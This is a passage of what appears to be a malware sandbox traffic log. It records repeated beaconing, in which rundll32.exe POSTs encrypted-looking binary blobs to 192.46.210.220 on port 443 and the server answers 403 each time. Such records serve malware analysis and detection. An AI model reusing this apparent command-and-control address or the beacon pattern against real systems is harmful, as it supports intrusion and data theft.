                                                                                                        2021-10-28 02:46:59 UTC283OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:00 UTC293INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:00 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        58192.168.2.550023192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:59 UTC288OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:59 UTC288OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:00 UTC293INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:00 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        59192.168.2.550030192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:03 UTC293OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:03 UTC293OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:04 UTC302INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:04 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        6192.168.2.549777192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:15 UTC29OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:15 UTC29OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:16 UTC34INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        60192.168.2.550031192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:03 UTC298OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:03 UTC298OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:04 UTC303INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:04 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        61192.168.2.550038192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:07 UTC303OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:07 UTC303OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:08 UTC312INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        62192.168.2.550039192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:07 UTC308OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:07 UTC308OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:08 UTC313INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        63192.168.2.550046192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:11 UTC313OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:11 UTC313OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:12 UTC322INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        64192.168.2.550047192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:11 UTC318OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:11 UTC318OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:12 UTC323INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        65192.168.2.550054192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:15 UTC323OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:15 UTC323OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:16 UTC328INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        66192.168.2.550055192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:16 UTC328OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:16 UTC328OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:17 UTC332INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:17 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        67192.168.2.550063192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:20 UTC333OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:20 UTC333OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:20 UTC342INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        68192.168.2.550064192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:20 UTC337OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:47:20 UTC338OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:47:21 UTC342INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:47:21 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        69192.168.2.550074192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:47:24 UTC343OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
